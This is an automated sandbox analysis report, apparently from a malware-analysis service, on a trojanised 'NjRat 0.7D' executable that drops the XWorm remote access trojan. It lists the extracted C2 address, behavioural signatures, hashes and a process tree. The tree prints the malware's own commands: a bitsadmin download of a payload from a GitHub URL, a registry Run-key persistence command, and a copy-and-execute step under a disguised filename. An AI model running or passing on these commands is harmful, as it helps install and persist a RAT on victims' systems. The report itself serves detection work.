Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 10:24

General

  • Target

    NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe

  • Size

    8.9MB

  • MD5

    3e8dc9ba82863bd3c1e5ec769d2c187f

  • SHA1

    fa80a09b2a6804868c26dbeb62b073d1546a132b

  • SHA256

    6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880

  • SHA512

    10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c

  • SSDEEP

    196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm

Malware Config

Extracted

Family

xworm

C2

83.143.112.30:3096

Mutex

Dza3YLL2q2qcgzdH

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
    "C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
      "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2948
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\System32\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
        3⤵
        • Download via BitsAdmin
        PID:2932
    • C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 9
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3604
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4792
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 20 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 20
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4848
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 20
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3624
        • C:\Windows\Isolation graphique de périphérique audio Windows .exe
          "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of AdjustPrivilegeToken
            PID:3716
          • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
            "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4468
            • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe
              "C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4544

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WatchDog.exe.log

    Filesize

    1KB

    MD5

    7dca233df92b3884663fa5a40db8d49c

    SHA1

    208b8f27b708c4e06ac37f974471cc7b29c29b60

    SHA256

    90c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c

    SHA512

    d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07

  • C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe

    Filesize

    8.5MB

    MD5

    70ea9c044c9a766330d3fe77418244a5

    SHA1

    18602d0db52917b88cbdab84ba89181e6fd4686a

    SHA256

    b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5

    SHA512

    5261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.exe

    Filesize

    76KB

    MD5

    0e362e7005823d0bec3719b902ed6d62

    SHA1

    590d860b909804349e0cdc2f1662b37bd62f7463

    SHA256

    2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

    SHA512

    518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    78B

    MD5

    771228b914581d4c92cb184ecf761d22

    SHA1

    858b7e3e6ff6191dc7fd561510d24c3fb424ed8f

    SHA256

    ba4755fd48143ad928ffb6cc38ef749b1f11ddb204a04856d32ea53c967d448c

    SHA512

    41537a8d5cbe04a53cf9c5f8eea68cc045b5c05336bcce162c88c00a66021511afbb5d1083b7883bc0e30e22f6d35d7421df486d25a102621f972bb1b5b3b1bf

  • C:\Users\Admin\AppData\Local\Temp\WatchDog.txt

    Filesize

    81B

    MD5

    0017979068fbfbd0fe002d93eed5fcd0

    SHA1

    e8cdad526e0698a58a1ef1818785bd1915137615

    SHA256

    669c02322dda6a727344f84900f27e07aab26f54c16319aefac42d8b602f4a2c

    SHA512

    dd819ffaf1e09af7f54ce515fd936e775ecdf6a82cbe53dac72f0ca1da024b8dd3fc8f3e94c8c48f2a4d5a9e942afd73ebb1d114c016363e1023b3b947bd6a11

  • C:\Users\Admin\AppData\Roaming\audiodg.exe

    Filesize

    355KB

    MD5

    d9dfa8ba182529445890b5021e159b77

    SHA1

    64f8724f8cd76adff12364e6bb2fc9eaceadb1ba

    SHA256

    60df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f

    SHA512

    d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803

  • C:\Users\Admin\AppData\Roaming\install.vbs

    Filesize

    19KB

    MD5

    4724c9dce57bc0472ed610ba16d08894

    SHA1

    d5fea3520146ccbf54c31b3b4868de499022fb37

    SHA256

    aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb

    SHA512

    d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18

  • memory/1960-34-0x00000000000F0000-0x000000000014E000-memory.dmp

    Filesize

    376KB

  • memory/1960-35-0x00000000059D0000-0x0000000005F74000-memory.dmp

    Filesize

    5.6MB

  • memory/1960-36-0x0000000005420000-0x00000000054B2000-memory.dmp

    Filesize

    584KB

  • memory/1960-37-0x00000000054C0000-0x000000000555C000-memory.dmp

    Filesize

    624KB

  • memory/1960-38-0x0000000005370000-0x000000000537A000-memory.dmp

    Filesize

    40KB

  • memory/1960-39-0x0000000006F30000-0x0000000006F72000-memory.dmp

    Filesize

    264KB

  • memory/2772-0-0x00007FF9FB583000-0x00007FF9FB585000-memory.dmp

    Filesize

    8KB

  • memory/2772-2-0x00007FF9FB580000-0x00007FF9FC041000-memory.dmp

    Filesize

    10.8MB

  • memory/2772-33-0x00007FF9FB580000-0x00007FF9FC041000-memory.dmp

    Filesize

    10.8MB

  • memory/2772-1-0x0000000000410000-0x0000000000D08000-memory.dmp

    Filesize

    9.0MB

  • memory/2948-20-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-44-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-43-0x0000000074852000-0x0000000074853000-memory.dmp

    Filesize

    4KB

  • memory/2948-16-0x0000000074850000-0x0000000074E01000-memory.dmp

    Filesize

    5.7MB

  • memory/2948-14-0x0000000074852000-0x0000000074853000-memory.dmp

    Filesize

    4KB

  • memory/3716-51-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/4004-48-0x0000000000580000-0x00000000005DE000-memory.dmp

    Filesize

    376KB

  • memory/4004-49-0x0000000007250000-0x000000000726A000-memory.dmp

    Filesize

    104KB

  • memory/4004-50-0x0000000007270000-0x0000000007276000-memory.dmp

    Filesize

    24KB

  • memory/4468-64-0x0000000000EE0000-0x0000000000EFA000-memory.dmp

    Filesize

    104KB